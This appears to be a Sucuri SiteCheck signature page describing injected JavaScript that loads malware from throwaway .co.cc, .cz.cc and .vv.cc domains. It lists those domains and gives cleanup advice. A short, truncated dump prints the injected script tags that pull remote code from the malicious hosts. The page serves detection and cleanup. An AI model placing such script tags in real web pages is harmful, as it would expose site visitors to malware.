SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwjs488

malware-entry-mwjs488

Description: Javascript included from a .co.cc domain, used to distribute malware.

Domains used:


ironydon.co.cc
google-analytisc.co.cc
js-o-kcjh.cz.cc
js-o-wiuf.cz.cc
oiihgw.co.cc
oiwdd.co.cc
pojdue.co.cc
berfry43bgrbf.vv.cc
burifym.cz.cc
drelagda.vv.cc
g243gtdsgsdg.vv.cc
glkgj5j4rshdfhj.vv.cc
gqgqhfdjdh.co.cc
gs34grsgdg.vv.cc
gsdg3gsdgsdg.vv.cc
gsg3gsdgsxgsdg.vv.cc
gwsg3gsgdsgd.vv.cc
hdsh4hsfhdsj.vv.cc
hgerwhu45.co.cc
hndfdfnfdnxdnf.vv.cc
jfgdhdfhsdfh.vv.cc
jfgjfr5jdfj.vv.cc
keleghma.vv.cc
kulawield.vv.cc
maridora.vv.cc
miraswyn.cz.cc
mkgk5jswhgfnxg.vv.cc
oghmalak.vv.cc
siranaya.vv.cc
gb3hnh3nf.co.cc
http://republikainfo.com/templates/beez5/javascript/html.js

Affecting: Any web site (no traffic specified)

Clean up: Malware is generally hidden behin a base64 encoded block on PHP. Contact b>support@sucuri.net if you have questions or want us to clean it up for you.

Malware dump:


<script type=''text/javascript`` src='"'http://aiqoiwdd.co.cc/50..

<script type=''text/javascript`` src='"'http://www.ironydon.co.cc/main.js?global..

<script type=''text/javascript`` src='"'http://oiwdd.co.cc/50..